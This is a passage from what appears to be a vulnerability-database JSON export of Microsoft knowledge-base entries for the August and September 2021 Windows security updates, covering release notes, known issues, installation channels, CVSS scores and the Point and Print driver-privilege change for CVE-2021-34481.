use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007260](<https://support.microsoft.com/help/5007260>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006739](<https://support.microsoft.com/help/5006739>). If after installing [KB5006739](<https://support.microsoft.com/help/5006739>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005623>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005623](<https://download.microsoft.com/download/f/e/b/feb6fda1-9d2a-40d5-9264-23b033a84e00/5005623.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005623 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005623", "href": "https://support.microsoft.com/en-us/help/5005623", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1159) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 19041.1161, 19042.1161, and 19043.1161\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog:If your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must **install the special standalone August 10, 2021 SSU (KB5005260).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005033>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005033](<https://download.microsoft.com/download/1/e/e/1eeb7268-cb6a-4865-a98b-9c51f0ec7beb/5005033.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1161, 19042.1161, and 19043.1161](<https://download.microsoft.com/download/f/7/4/f74513f3-7838-4538-89f5-8be86d571826/SSU_version_19041_1161.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005033 (OS Builds 19041.1165, 19042.1165, and 19043.1165)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005033", "href": "https://support.microsoft.com/en-us/help/5005033", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:20", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005391](<https://support.microsoft.com/help/5005390>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005036](<https://support.microsoft.com/help/5005036>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KBNNNNNNN>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005095](<https://download.microsoft.com/download/2/f/9/2f99a9fc-08b2-4463-9199-43e8f557ead0/5005095.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005095 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005095", "href": "https://support.microsoft.com/en-us/help/5005095", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page. **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the July 13, 2021 servicing stack update (SSU) (KB5004748) or the latest SSU (KB5005412) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005031>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005031](<https://download.microsoft.com/download/5/9/0/5901bffe-66e8-4289-9077-b87ae1af9813/5005031.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005031 (OS Build 18363.1734)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005031", "href": "https://support.microsoft.com/en-us/help/5005031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005392](<https://support.microsoft.com/help/5005392>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU 